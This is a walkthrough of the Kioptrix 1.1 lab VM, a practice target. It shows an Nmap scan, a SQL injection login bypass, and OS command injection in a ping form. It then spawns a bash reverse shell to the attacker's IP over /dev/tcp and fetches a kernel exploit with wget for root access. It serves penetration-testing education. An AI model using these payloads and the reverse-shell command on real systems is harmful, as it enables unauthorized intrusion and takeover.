About Kioptrix VM Image Challenges:
The Kioptrix VM’s offer simple challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
We will be using Kali Linux as our offensive OS and we will be running both Kali and the Kioptrix VM on VMware.
You can download the Kioptrix 1.1 VM from the following link: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Our Kali VM has a local IP address of 192.168.1.106.
The Kioptrix 1.1 VM has a local IP address of 192.168.1.104.
Scanning & Enumeration
Let us get started by performing a Nmap scan on the target, we will be using the following arguments in our scan.
nmap -sV -sC 192.168.1.10422/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)| ssh-hostkey:| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)|_sshv1: Server supports SSHv180/tcp open http Apache httpd 2.0.52 ((CentOS))|_http-server-header: Apache/2.0.52 (CentOS)|_http-title: Site doesn't have a title (text/html; charset=UTF-8).111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 741/udp status|_ 100024 1 744/tcp status443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))|_http-server-header: Apache/2.0.52 (CentOS)|_http-title: Site doesn't have a title (text/html; charset=UTF-8).| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--| Not valid before: 2009-10-08T00:10:47|_Not valid after: 2010-10-08T00:10:47|_ssl-date: 2019-09-05T05:58:10+00:00; -3h09m39s from scanner time.| sslv2:| SSLv2 supported| ciphers:| SSL2_RC4_128_EXPORT40_WITH_MD5| SSL2_RC2_128_CBC_WITH_MD5| SSL2_DES_192_EDE3_CBC_WITH_MD5| SSL2_RC4_64_WITH_MD5| SSL2_DES_64_CBC_WITH_MD5| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5|_ SSL2_RC4_128_WITH_MD5631/tcp open ipp CUPS 1.1| http-methods:|_ Potentially risky methods: PUT|_http-server-header: CUPS/1.1|_http-title: 403 Forbidden3306/tcp open mysql MySQL (unauthorized)MAC Address: 00:0C:29:78:54:A7 (VMware)Device type: general purpose|media deviceRunning: Linux 2.6.X, Star Track embeddedOS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hdOS details: Linux 2.6.9 - 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)Network Distance: 1 hop
From the results, we can see that the target has various ports open, here are some of the interesting ones we should test:
- SSH – 22
- Apache – 80/443
- MySQL – 3306
On the SSH port, we have OpenSSH 3.9p1 running, which is not vulnerable to any known exploit, so this can be used as an access vector after we have exploited the system, let us move on to the webserver.
For Apache, we have both HTTP and HTTPS ports running, when we try loading up the website with port 443, we get an error informing us that the SSL certificate has expired, so we will have to access the HTTP version.
We are greeted with a simple admin panel, this is very interesting as it is a custom login screen developed in PHP and does not belong to any CMS, our first objective is to try and bypass the login screen with SQL injection.
You can use the most common SQL injection queries synonymous with bypassing login in screens, after trial and error, we found that this query worked:
admin ' --
After we successfully bypassed the login in screen, we were greeted by an administrative web console, that allows us to ping computers on our local network. We can specify the IP and we get the results presented to us.
From running a few tests with various local IP addresses, it becomes clear that we are able to perform OS command injection, we can check if the commands are being filtered by breaking the initial statement and by using another command, in our case we used:
We specified the IP address and specified another OS command like pwd, which will print the current working directory if the commands are not being filtered. After running the command, it becomes obvious that the commands aren’t being filtered and we can run any system commands.
As you can see from the image above, after running the ping command and displaying the corresponding results, we can see the results from the pwd command, and it tells us that the current working directory is the default Apache directory, which in turn tells us that we are currently running commands as the Apache system user.
Spawning A Reverse Shell
The next step is to get access to the server by using a reverse shell, and since we can run system commands we do not need to use PHP, instead, we can use the bash reverse shell and specify our IP and preferred port (This is also because the target OS does not have netcat installed). We will be using the following command to spawn our reverse shell.
bash -i >& /dev/tcp/192.168.1.106/1234 0>&1
Before we execute the command, we need to set up a listener with Netcat, this can be done by using the following command:
nc -nvlp 1234
After the reverse shell has been set up and is listening on port 1234, we can now execute the command.
After executing the command, we should receive a shell through the netcat listener we set up, and indeed we do. We are greeted by a bash shell with no job control.
We now have access to the target and we can begin performing some system enumeration, so as to assist with privilege escalation.
We have determined that we are running CentOS version 4.5 running Linux kernel 2.6.9, our next objective is to search for any potential privilege escalation exploits that we can utilize. We will use searchsploit.
After searching with searchsploit we find an interesting exploit that meets our system criteria, the next step is to copy the exploit to our working directory and to upload it to the target for compilation and execution.
To copy the exploit over, we will setup SimpleHTTPServer and we will use wget to copy the exploit over to the target VM. We will use the following commands:
python -m SimpleHTTPServer
We can now use wget to download the exploit on to our target OS. We will download the file to the /tmp directory as we do not have sufficient permissions as the Apache user.
After we successfully download the file on to the target OS, we can follow the compilation instructions and execute the exploit.
After compiling and executing the exploit, we finally get a shell with root access!